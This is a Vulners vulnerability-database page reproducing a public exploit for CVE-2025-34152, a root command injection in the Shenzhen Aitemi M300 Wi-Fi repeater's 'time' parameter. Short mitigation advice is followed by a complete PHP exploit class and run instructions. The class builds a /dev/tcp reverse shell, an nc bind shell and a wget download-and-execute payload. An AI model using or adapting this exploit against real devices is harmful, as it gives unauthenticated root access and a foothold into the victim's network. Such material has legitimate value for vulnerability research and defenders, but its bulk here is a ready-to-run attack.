Vulners
Lucene search
📄 Shenzhen Aitemi M300 Wi-Fi Repeater Remote Code Execution
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Exploit for CVE-2025-34152 | 21 Sep 202513:56 | – | githubexploit |
 | CVE-2025-34152 | 7 Aug 202520:07 | – | circl |
 | Itemir M300 Wi-Fi Repeater 安全漏洞 | 7 Aug 202500:00 | – | cnnvd |
 | CVE-2025-34152 | 7 Aug 202516:44 | – | cve |
 | CVE-2025-34152 Shenzhen Aitemi M300 Wi-Fi Repeater OS Command Injection via Time Parameter | 7 Aug 202516:44 | – | cvelist |
 | EUVD-2025-23927 | 7 Aug 202516:44 | – | euvd |
 | Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param) | 10 Sep 202518:53 | – | metasploit |
 | Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated Remote Command Execution via `time` Parameter | 4 Feb 202607:00 | – | nuclei |
 | CVE-2025-34152 | 7 Aug 202517:15 | – | nvd |
 | 📄 Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated Remote Code Execution | 8 Aug 202500:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ebay.com/itm/404211745927 |
=============================================================================================================================================
POC :
[+] General Information
----------------------
- Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated RCE (https://packetstorm.news/files/id/209361/)
- CVE ID: CVE-2025-34152
- Vulnerability Type: Remote Command Injection – Unauthenticated
- Privilege Level: Root
- Severity: Critical (10/10)
2. Vulnerability Description
----------------------------
The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated
remote command injection vulnerability in the "time" parameter handled by:
protocol.csp?fname=system&opt=time_conf&function=set
The parameter is passed directly into:
date -s "$time"
Because user-supplied input is unsanitized, an attacker can inject backtick-executed
shell commands:
time=`COMMAND`
These commands execute with full root privileges without requiring authentication.
3. Exploitation
----------------
Example malicious injection:
time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`
URL-encoded version:
time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60
The payload is delivered through an unauthenticated POST request.
4. Security Impact
------------------
- Full remote command execution as root
- No authentication required
- No reboot needed
- Immediate full compromise of the device
- Allows uploading, downloading, deleting files
- Enables persistent backdoors
- May give access to the entire network environment
5. Recommendations
------------------
- Update firmware as soon as possible
- Restrict access to port 80
- Place the device behind a firewall/WAF
- Avoid exposing the repeater to WAN environments
===================================================================
6. Full Converted PHP Exploit Code
===================================================================
<?php
class AitemiM300_Advanced {
private $target;
private $port;
private $path;
private $logFile = "exploit-log.txt";
public function __construct($target, $port = 80, $path = "/") {
$this->target = rtrim($target, '/');
$this->port = $port;
$this->path = $path;
}
private function log($txt) {
file_put_contents($this->logFile, "[" . date("Y-m-d H:i:s") . "] $txt\n", FILE_APPEND);
}
private function sendReq($method, $uri, $data = null, $headers = []) {
$url = "http://{$this->target}:{$this->port}{$uri}";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$body = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
$this->log("HTTP $method $uri => Code $code");
return ['body' => $body, 'code' => $code];
}
public function check() {
$res = $this->sendReq("GET", "/favicon.ico");
if ($res['code'] !== 200) {
return "SAFE: favicon.ico missing – likely not vulnerable.";
}
$hash = hash("sha256", $res['body']);
if ($hash === "eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee") {
return "✓ Appears: Aitemi M300 device confirmed.";
}
return "UNKNOWN: Unable to verify device identity.";
}
public function exploit($cmd) {
$raw = "`$cmd`";
$enc = urlencode($raw);
$enc = str_replace("+", "%20", $enc);
$data = "fname=system&opt=time_conf&function=set&time=$enc";
$headers = [
"Content-Type: application/x-www-form-urlencoded"
];
return $this->sendReq("POST", "/protocol.csp?", $data, $headers);
}
public function payload_reverse_shell($ip, $port) {
return "sh -i >& /dev/tcp/$ip/$port 0>&1";
}
public function payload_bind_shell($port = 4444) {
return "nc -lp $port -e /bin/sh";
}
public function payload_mips_wget($url) {
return "wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x";
}
public function payload_pingback($ip) {
return "ping -c 1 $ip";
}
public function run_payload($payload) {
return $this->exploit($payload);
}
}
// Example Usage:
$exp = new AitemiM300_Advanced("192.168.1.1");
echo $exp->check() . "\n";
$payload = $exp->payload_reverse_shell("192.168.1.100", 4444);
$exp->run_payload($payload);
echo "✓ Payload sent...\n";
?>
===================================================================
7. How To Save And Execute The PHP Exploit Code
===================================================================
Follow the steps below to properly save and run the converted PHP exploit code.
1. Saving The Exploit
---------------------
- Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.
- Copy the full PHP exploit code block from section 6.
- Save the file as:
aitemi_m300_rce.php
- Make sure the file extension is `.php` and the encoding is UTF‑8.
2. Preparing The Environment
----------------------------
The exploit requires:
- PHP 7.x or PHP 8.x installed.
- cURL support enabled (php‑curl extension).
- Internet / network access to the target device.
Check PHP version:
php -v
Check curl module:
php -m | findstr curl (Windows)
php -m | grep curl (Linux)
3. Running The Exploit (Windows)
--------------------------------
Open Command Prompt or PowerShell:
cd C:\path\to\exploit\
php aitemi_m300_rce.php
4. Running The Exploit (Linux / macOS)
--------------------------------------
Terminal:
cd /path/to/exploit/
php aitemi_m300_rce.php
Run in background:
nohup php aitemi_m300_rce.php &
5. Customizing Payloads
-----------------------
Modify:
$exp = new AitemiM300_Advanced("192.168.1.1");
Reverse shell:
$payload = $exp->payload_reverse_shell("YOUR_IP", 4444);
Bind shell:
$payload = $exp->payload_bind_shell(5555);
MIPS wget payload:
$payload = $exp->payload_mips_wget("http://YOUR_IP/mips.bin");
Execute:
$exp->run_payload($payload);
6. Verifying RCE
----------------
- Reverse shell connection
- Pingback
- exploit-log.txt
- Observed device behavior
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Feb 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 49.4
EPSS0.61676
SSVC